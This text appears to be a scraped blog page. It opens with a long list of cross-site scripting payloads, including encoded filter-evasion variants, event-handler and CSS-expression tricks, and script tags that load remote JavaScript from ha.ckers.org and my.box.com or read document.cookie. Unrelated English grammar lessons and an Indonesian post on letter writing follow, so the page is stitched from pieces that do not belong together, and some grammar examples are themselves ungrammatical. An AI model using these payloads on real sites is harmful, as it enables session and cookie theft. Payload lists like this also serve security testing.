&LT
&LT;
&#60
&#060
&#0060
&#00060
&#000060
&#0000060
&lt;
&#x3c
&#x03c
&#x003c
&#x0003c
&#x00003c
&#x000003c
&#x3c;
&#x03c;
&#x003c;
&#x0003c;
&#x00003c;
&#x000003c;
&#X3c
&#X03c
&#X003c
&#X0003c
&#X00003c
&#X000003c
&#X3c;
&#X03c;
&#X003c;
&#X0003c;
&#X00003c;
&#X000003c;
&#x3C
&#x03C
&#x003C
&#x0003C
&#x00003C
&#x000003C
&#x3C;
&#x03C;
&#x003C;
&#x0003C;
&#x00003C;
&#x000003C;
&#X3C
&#X03C
&#X003C
&#X0003C
&#X00003C
&#X000003C
&#X3C;
&#X03C;
&#X003C;
&#X0003C;
&#X00003C;
&#X000003C;
\x3c
\x3C
\u003c
\u003C
&lt;iframe src=http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html&gt;
&lt;IMG SRC=\"javascript&#058;alert('XSS')\"
&lt;SCRIPT SRC=//ha&#46;ckers&#46;org/&#46;js&gt;
&lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js?&lt;B&gt;
&lt;&lt;SCRIPT&gt;alert(\"XSS\");//&lt;&lt;/SCRIPT&gt;
&lt;SCRIPT/SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
&lt;BODY onload!#$%&()*~+-_&#46;,&#58;;?@&#91;/|\&#93;^`=alert(\"XSS\")&gt;
&lt;SCRIPT/XSS SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
&lt;IMG SRC=\"   javascript&#058;alert('XSS');\"&gt;
perl -e 'print \"&lt;SCR\0IPT&gt;alert(\\"XSS\\")&lt;/SCR\0IPT&gt;\";' &gt; out
perl -e 'print \"&lt;IMG SRC=java\0script&#058;alert(\\"XSS\\")&gt;\";' &gt; out
&lt;IMG SRC=\"jav&#x0D;ascript&#058;alert('XSS');\"&gt;
&lt;IMG SRC=\"jav&#x0A;ascript&#058;alert('XSS');\"&gt;
&lt;IMG SRC=\"jav&#x09;ascript&#058;alert('XSS');\"&gt;
&lt;IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29&gt;
&lt;IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041&gt;
&lt;IMG SRC=javascript&#058;alert('XSS')&gt;
&lt;IMG SRC=javascript&#058;alert(String&#46;fromCharCode(88,83,83))&gt;
&lt;IMG \"\"\"&gt;&lt;SCRIPT&gt;alert(\"XSS\")&lt;/SCRIPT&gt;\"&gt;
&lt;IMG SRC=`javascript&#058;alert(\"RSnake says, 'XSS'\")`&gt;
&lt;IMG SRC=javascript&#058;alert(&quot;XSS&quot;)&gt;
&lt;IMG SRC=JaVaScRiPt&#058;alert('XSS')&gt;
&lt;IMG SRC=javascript&#058;alert('XSS')&gt;
&lt;IMG SRC=\"javascript&#058;alert('XSS');\"&gt;
&lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt;
'';!--\"&lt;XSS&gt;=&{()}
';alert(String&#46;fromCharCode(88,83,83))//\';alert(String&#46;fromCharCode(88,83,83))//\";alert(String&#46;fromCharCode(88,83,83))//\\";alert(String&#46;fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;\"&gt;'&gt;&lt;SCRIPT&gt;alert(String&#46;fromCharCode(88,83,83))&lt;/SCRIPT&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascrscriptipt:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=" &#14;  javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
\";alert('XSS');//
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
¼script¾alert(¢XSS¢)¼/script¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="width: expression(alert('XSS'));">
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
<XSS STYLE="xss:expression(alert('XSS'))">
exp/*<A STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e);
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;"></BODY></HTML>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<form id="test" /><button form="test" formaction="javascript:alert(123)">TESTHTML5FORMACTION
<form><button formaction="javascript:alert(123)">crosssitespt
<frameset onload=alert(123)>
<!--<img src="--><img src=x onerror=alert(123)//">
<style><img src="</style><img src=x onerror=alert(123)//">
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
<embed src="javascript:alert(1)">
<? foo="><script>alert(1)</script>">
<! foo="><script>alert(1)</script>">
</ foo="><script>alert(1)</script>">
<script>({0:#0=alert/#0#/#0#(123)})</script>
<script>ReferenceError.prototype.__defineGetter__('name', function(){alert(123)}),x</script>
<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>
<script src="#">{alert(1)}</script>;1
<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>
<svg xmlns="#"><script>alert(1)</script></svg>
<svg onload="javascript:alert(123)" xmlns="#"></svg>
<iframe xmlns="#" src="javascript:alert(1)"></iframe>
+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-
+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-
%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-
%253cscript%253ealert(document.cookie)%253c/script%253e
“><s”%2b”cript>alert(document.cookie)</script>
“><ScRiPt>alert(document.cookie)</script>
“><<script>alert(document.cookie);//<</script>
foo<script>alert(document.cookie)</script>
<scr<script>ipt>alert(document.cookie)</scr</script>ipt>
%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E
‘; alert(document.cookie); var foo=’
foo\’; alert(document.cookie);//’;
</script><script >alert(document.cookie)</script>
<img src=asdf onerror=alert(document.cookie)>
<BODY ONLOAD=alert(’XSS’)>
<script>alert(1)</script>
"><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script>
<video src=1 onerror=alert(1)>
<audio src=1 onerror=alert(1)>

Sabtu, 15 April 2017

Use Of Prepositions & Common Combination and Preposition

Use Of Prepositions

             A preposition describes a relationship between other words in a sentence. In itself, a word like "in" or "after" is rather meaningless and hard to define in mere words. For instance, when you do try to define a preposition like "in" or "between" or "on," you invariably use your hands to show how something is situated in relationship to something else. Prepositions are nearly always combined with other words in structures called prepositional phrases. Prepositional phrases can be made up of a million different words, but they tend to be built the same: a preposition followed by a determiner and an adjective or two, followed by a pronoun or noun (called the object of the preposition). This whole phrase, in turn, takes on a modifying role, acting as an adjective or an adverb, locating something in time and space, modifying a noun, or telling when or where or under what conditions something happened.


Example.
Prepositions Of Time : at, on, and in
We use at to designate specific times.

  • The train is due at 12:15 p.m.
We use on to designate days and dates.

  • My brother is coming on Monday.
  • We're having a party on the Fourth of July.


We use in for nonspecific times during a day, a month, a reason, or a year.
  • She like to jog in the morning.
  • It's too cold in winter to run outside.



Prepositions of Place : at, on, and in.
We use at for specific address.
  • Grammar English live at 55 Boretz Road in Durham.
We use on to designate name of streets, avenues, etc.
  • Her house is on Boretz Road.
And we use in for the names of land-areas (towns, countries, states,countries, and continents).
  • She live in Durham.
  • Durham is in Windham Country.
  • Windham Country is in Connecticut.


Common Combination and Preposition.

              Most phrasal verb is composed of two words: verb + particle. But some are made up of three words, namely: particle + verb + preposition, which is known as phrasal-prepositional verb. So phrasal-prepositional multi-word verb is a verb which consists of a verb, particle and preposition.

Between particle (adverb that looks like a preposition) and phrasal preposition on-prepositional verb inseparable (inseparated) and the object is always to follow the multi-word verb is due to end in the form of a preposition (preposition always has an object). Because it is always followed by an object, all phrasal-prepositional verb is transitive.




http://grammar.ccc.commnet.edu/grammar/prepositions.htm
http://dictionary.cambridge.org/grammar/british-grammar/about-nouns/nouns-and-prepositions

Kamis, 09 Maret 2017

COMMONLY MISUSED WORD AND CONFUSINGLY RELATED WORD

Commonly Misused Word
1.      Accept, Except
Accept : Agree to or receive
Except : Leave out or not including
· You must accept this money for buy food tonight
·  All my family will back to the hometown except me

2. Principal, Principle
Principal : Mean chief (person)
Principle : Mean basic truth or a moral ruler that influence someone
·  Bouman is the principal in my school
·   It was my principle that always make my parent happy

3. Hear, Here
Hear : listen about something
Here  : tell position
· Do you hear me?
· You must standing here

4. Buy, By
Buy : means a purchase something
By   : proposition meaning close to or indicating who did something
· I buy a laptop yesterday
· My favourite novel is by Andrea Hirata

Confusingly Related Words
1. Advice, Advise
Advice : Opinion given someone (noun form)
Advise : Act of giving an opinion (verb form)
·  She can give you a good advice will make you to be a better person
·  I can find the best way to advise your brother

2. Affect, Effect
Affect : Mean influence (usually a verb)
Effect : End result of influence (usually a noun)
·  This supplement can affect my concentration on work
·   The effect of Tsunami was devasting

3. Save, Safe
Save : Mean to keep or to save (verb)
Safe  : Mean giving protection (adjective)
· Please save this document
· I feel safe with you

Minggu, 29 Januari 2017

Tujuan dan Fungsi Surat


Kegiatan surat menyurat didasarkan pada maksud tertentudalam proses pemberian informasi. Selain itu surat memiliki kegunaan yang penting. Berikut ini akan dipaparkan mengenai tujuan dan fungsi surat.
1.       Tujuan Surat

Tujuan seseorang atau suatu organisasi/kantor menulis surat adalah:
a.       Menyampaikan informasi
b.      Menyampaikan maksud dan tujuan sesuai dengan isi hati penulis.
c.       Memperlancar arus komunikasi sehingga informasi yang diterima jelas dan tidak salah tafsir.
d.      Mengehemat waktu, tenaga, dan biaya dari pada bertemu langsung dengan pihak yang dituju.

Pada kenyataan, dalam menulis surat ada beberapa kesalahan yang sering ditemukan, baik diinstansi pemerintah maupun lembaga sosial dan perusahan-perusahan. Kesalahan-kesalahan tersebut antara lain:
a.       Penggunaan tanda baca yang kurang tepat sehingga menimbulkan salah pengertian.
b.      Susunan kalimat yang tidak lengkap.
c.       Tata bahasa yang tidak teratur.
d.      Ketikan salah atau banyak yang kotor.
e.      Pemakian kata dan istlah asing yang tidak tepat.
f.        Kurang sopan dan ceroboh dalam mengutarkan gagasan.
g.       Penggunanaan ejaan yang tidak sesuai dengan ejaan yang disempurnakan.
h.      Kalimat sering tidak lengkap, berbelit-belit dan bertele-tele.
i.         Susunan isi atau komposisi surat yang tidak teratur.

2.       Fungsi Surat
Surat dinilai efektif jika ada yang disampaikan penulis kepada penerima berita sejalan atau sesuai dengan harapan pengirim. Isi surat harus jelas da mudah dimengerti pihak penerima sehingga tidak menimbulkan salah paham dan keragu-raguan dari pihak penerima surat. Oleh karena itu surat mempunyai beberapa fungsi di antaranya adalah:
a.       Sebagai alat bukti autentik (pelaku hukum).
b.      Sebagai alat pengingat.
c.       Sebagai bukti historis (sejarah).
d.      Sebagai pedoman untuk bertindak.
e.      Sebagai duta/wakil.
f.        Sebagai jaminan keamanan.
g.       Sebagai media komunikasi.
h.      Sebagai barometer kemajuaan suatu kantor.



http://shimakw.blogspot.co.id/